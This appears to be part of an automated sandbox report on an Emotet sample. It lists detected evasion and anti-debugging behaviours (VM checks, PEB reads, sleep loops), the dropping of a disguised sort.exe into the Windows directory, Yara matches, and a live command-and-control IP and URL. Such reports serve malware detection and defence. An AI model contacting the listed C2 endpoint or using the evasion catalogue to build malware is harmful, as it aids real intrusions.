Source: C:\Windows\SysWOW64\setupugc\sort.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\setupugc\sort.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\setupugc\sort.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\setupugc\sort.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\setupugc\sort.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\Desktop\2ojdmC51As.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\Desktop\2ojdmC51As.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\2ojdmC51As.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains functionality to enumerate running services
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap, 0_2_02235070
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap, 0_2_02235070
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\2ojdmC51As.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\setupugc\sort.exe API coverage: 4.8 %
Source: C:\Users\user\Desktop\2ojdmC51As.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\setupugc\sort.exe API coverage: 4.8 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\svchost.exe TID: 5820 Thread sleep time: -150000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5820 Thread sleep time: -150000s >= -30000s Jump to behavior
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\2ojdmC51As.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_004182CC FindFirstFileA,FindClose, 0_2_004182CC
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00417B29 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA, 0_2_00417B29
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_022338F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose, 0_2_022338F0
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_004182CC FindFirstFileA,FindClose, 0_2_004182CC
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00417B29 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA, 0_2_00417B29
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_022338F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose, 0_2_022338F0
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_004182CC FindFirstFileA,FindClose, 1_2_004182CC
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_00417B29 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA, 1_2_00417B29
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_022738F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,_snwprintf,FindClose,FindClose, 1_2_022738F0
Source: svchost.exe, 00000003.00000002.727188639.0000024903260000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.740471778.0000024E18060000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.771007712.0000027874600000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: sort.exe, 00000001.00000002.932241533.0000000002A70000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.770339069.00000278736D9000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000003.00000002.727188639.0000024903260000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.740471778.0000024E18060000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.771007712.0000027874600000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000003.00000002.727188639.0000024903260000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.740471778.0000024E18060000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.771007712.0000027874600000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 00000003.00000002.727188639.0000024903260000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.740471778.0000024E18060000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.771007712.0000027874600000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: svchost.exe, 00000003.00000002.727188639.0000024903260000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.740471778.0000024E18060000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.771007712.0000027874600000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: sort.exe, 00000001.00000002.932241533.0000000002A70000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.770339069.00000278736D9000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000003.00000002.727188639.0000024903260000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.740471778.0000024E18060000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.771007712.0000027874600000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000003.00000002.727188639.0000024903260000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.740471778.0000024E18060000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.771007712.0000027874600000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 00000003.00000002.727188639.0000024903260000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.740471778.0000024E18060000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.771007712.0000027874600000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\setupugc\sort.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\setupugc\sort.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\setupugc\sort.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\setupugc\sort.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_004013A4 LoadLibraryA,GetProcAddress,CreateDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,VirtualAlloc, 0_2_004013A4
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_004013A4 LoadLibraryA,GetProcAddress,CreateDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,VirtualAlloc, 0_2_004013A4
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_004013A4 LoadLibraryA,GetProcAddress,CreateDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,VirtualAlloc, 0_2_004013A4
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_004013A4 LoadLibraryA,GetProcAddress,CreateDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,VirtualAlloc, 0_2_004013A4
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02234E20 mov eax, dword ptr fs:[00000030h] 0_2_02234E20
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02233F20 mov eax, dword ptr fs:[00000030h] 0_2_02233F20
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02234E20 mov eax, dword ptr fs:[00000030h] 0_2_02234E20
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02233F20 mov eax, dword ptr fs:[00000030h] 0_2_02233F20
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02274E20 mov eax, dword ptr fs:[00000030h] 1_2_02274E20
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02273F20 mov eax, dword ptr fs:[00000030h] 1_2_02273F20
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02225ABE mov eax, dword ptr fs:[00000030h] 1_2_02225ABE
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_0222095E mov eax, dword ptr fs:[00000030h] 1_2_0222095E
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_022269BE mov eax, dword ptr fs:[00000030h] 1_2_022269BE
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02220456 mov eax, dword ptr fs:[00000030h] 1_2_02220456
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02241030 mov eax, dword ptr fs:[00000030h] 1_2_02241030
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_022342F0 GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap, 0_2_022342F0
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_022342F0 GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap, 0_2_022342F0
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00409C36 SetUnhandledExceptionFilter, 0_2_00409C36
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00409C48 SetUnhandledExceptionFilter, 0_2_00409C48
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00409C36 SetUnhandledExceptionFilter, 0_2_00409C36
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00409C48 SetUnhandledExceptionFilter, 0_2_00409C48
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_00409C36 SetUnhandledExceptionFilter, 1_2_00409C36
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_00409C48 SetUnhandledExceptionFilter, 1_2_00409C48
Source: sort.exe, 00000001.00000002.931565521.0000000000C60000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: sort.exe, 00000001.00000002.931565521.0000000000C60000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: sort.exe, 00000001.00000002.931565521.0000000000C60000.00000002.00000001.sdmp Binary or memory string: Progman
Source: sort.exe, 00000001.00000002.931565521.0000000000C60000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: sort.exe, 00000001.00000002.931565521.0000000000C60000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: sort.exe, 00000001.00000002.931565521.0000000000C60000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: sort.exe, 00000001.00000002.931565521.0000000000C60000.00000002.00000001.sdmp Binary or memory string: Progman
Source: sort.exe, 00000001.00000002.931565521.0000000000C60000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\setupugc\sort.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\setupugc\sort.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00406204 GetLocalTime,GetSystemTime,GetTimeZoneInformation, 0_2_00406204
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00406204 GetLocalTime,GetSystemTime,GetTimeZoneInformation, 0_2_00406204
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00406204 GetLocalTime,GetSystemTime,GetTimeZoneInformation, 0_2_00406204
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00406204 GetLocalTime,GetSystemTime,GetTimeZoneInformation, 0_2_00406204
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00425FF1 GetVersion,GetProcessVersion,LoadCursorA,LoadCursorA,LoadCursorA, 0_2_00425FF1
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00425FF1 GetVersion,GetProcessVersion,LoadCursorA,LoadCursorA,LoadCursorA, 0_2_00425FF1
Source: C:\Windows\SysWOW64\setupugc\sort.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\setupugc\sort.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Emotet
Source: Yara match File source: 00000001.00000002.931629655.0000000002220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.667768852.0000000000664000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.931663752.0000000002244000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.667721626.0000000000620000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.2ojdmC51As.exe.2230000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.sort.exe.2270000.1.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 319735 Sample: 2ojdmC51As.exe Startdate: 18/11/2020 Architecture: WINDOWS Score: 80 23 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->23 25 Found malware configuration 2->25 27 Yara detected Emotet 2->27 29 Machine Learning detection for sample 2->29 6 2ojdmC51As.exe 4 2->6         started        10 svchost.exe 1 2->10         started        12 svchost.exe 1 2->12         started        14 svchost.exe 1 2->14         started        process3 dnsIp4 21 192.168.2.1 unknown unknown 6->21 31 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 6->31 33 Drops executables to the windows directory (C:\Windows) and starts them 6->33 35 Hides that the sample has been downloaded from the Internet (zone.identifier) 6->35 16 sort.exe 14 6->16         started        signatures5 process6 dnsIp7 19 200.116.145.225, 443, 49742 EPMTelecomunicacionesSAESPCO Colombia 16->19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
200.116.145.225
 unknown Colombia
13489 EPMTelecomunicacionesSAESPCO true

Private
IP
192.168.2.1

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://200.116.145.225:443/0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm/ true
  • Avira URL Cloud: safe
 unknown